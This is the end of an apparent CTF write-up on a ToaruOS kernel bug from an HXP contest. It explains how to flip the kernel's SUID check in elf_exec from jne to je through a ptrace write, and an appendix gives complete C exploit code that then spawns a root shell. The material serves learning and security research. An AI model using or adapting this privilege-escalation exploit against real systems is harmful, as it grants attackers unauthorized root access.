—[ 6.2 - SUIDn’t


The exploit strategy I ended up using was a lot simpler to implement.

We can alter kernel memory anywhere, even the .text section and we know
where everything is since there's no KASLR.

Remember the SUID check in 'elf_exec' that I talked about in 5.3?
Because we know the exact version of the kernel, we can simply look at
the kernel image or read /proc/kallsyms in our local instance to find
out at which address in virtual memory that function is.

    local@livecd ~$ sudo cat /proc/kallsyms | grep elf_exec
    000000000010f300 elf_exec


Disassembling the function with 'objdump' we can find the exact jump
instruction that implements the if statement for SUID binaries.

It is compiled to a 'jne' (jump not equal) conditional
jump instruction that skips past the uid assignment if the binary isn't
SUID.

        10f365: 0f 85 48 01 00 00       jne    0x10f4b3


To turn 'jne' into 'je' we just need to flip the 0x85 into a 0x84 byte.

        10f365: 0f 84 48 01 00 00       je    0x10f4b3


This negates the check so that now only non-SUID binary will assign
their owners uid.

Afterwards, simply running '/bin/esh' turns you into root and you can
read the flag.

—[ 7 - In Closing


I hope this article can help some curious people get started in the
kernel security space. If nothing else maybe it can give somebody an
appreciation for it.

I also hope it doesn't seem like I am disparaging ToaruOS in any way.
I really like the project. Security is not its main focus and still it
is likely more stable and secure than many other hobby OSes.
Kernel security is very very hard and even harder on defense.

Kernel security has many pitfalls. Both because it is the core of what
protects everything on any OS and also because there are many low level
details that we usually have the luxury of ignoring in user space.

I want to thank the HXP team for the fun CTF they hosted and my friends
who I forced to proof-read for me. In particular Lukas Ratz, who
motivated me to participate in the first place.

—[ A - Exploit Code

#include <stdio.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <errno.h>
#include <string.h>
#include <signal.h>
#include <ctype.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/signal.h>
#include <sys/signal_defs.h>
#include <syscall_nums.h>

int main(int argc, char** argv)
{
    printf("[+] Starting exploit\n");
    pid_t c_pid = fork();
    if(c_pid<0)
    {
        printf("[-] Couldn't fork\n");
        return -1;
    }
    // Child
    if(c_pid==0)
    {
        //attaching debugger so we can ptrace_poke
        if(ptrace(PTRACE_TRACEME,0,NULL,NULL))
        {
            return -1;
        }
        signal(SIGINT, SIG_IGN);
        return 0;
    }
    int status = 0;
    waitpid(c_pid, &status, WSTOPPED);
    printf("[+] Child stopped as expected\n");
    printf("[+] Replacing suid check\n");
    char data[4];
    //diff between jnz and je
    data[0] = 0x84; 
    //jmp after compare in elf_exec for suid check
    void* target = 0x0010f365+1; 
    int ret = ptrace(PTRACE_POKEDATA, c_pid, target, &data[0]);
    if(ret<0)
    {
        perror("ptrace");
        return -1;
    }
    printf("[+] Should have broken check, get root shell\n");
    char *n_argv[] = {"/bin/esh",NULL};
    execve("/bin/esh", n_argv,NULL);
}


|=[ EOF ]=---------------------------------------------------------------=|

.:: Linenoise ::.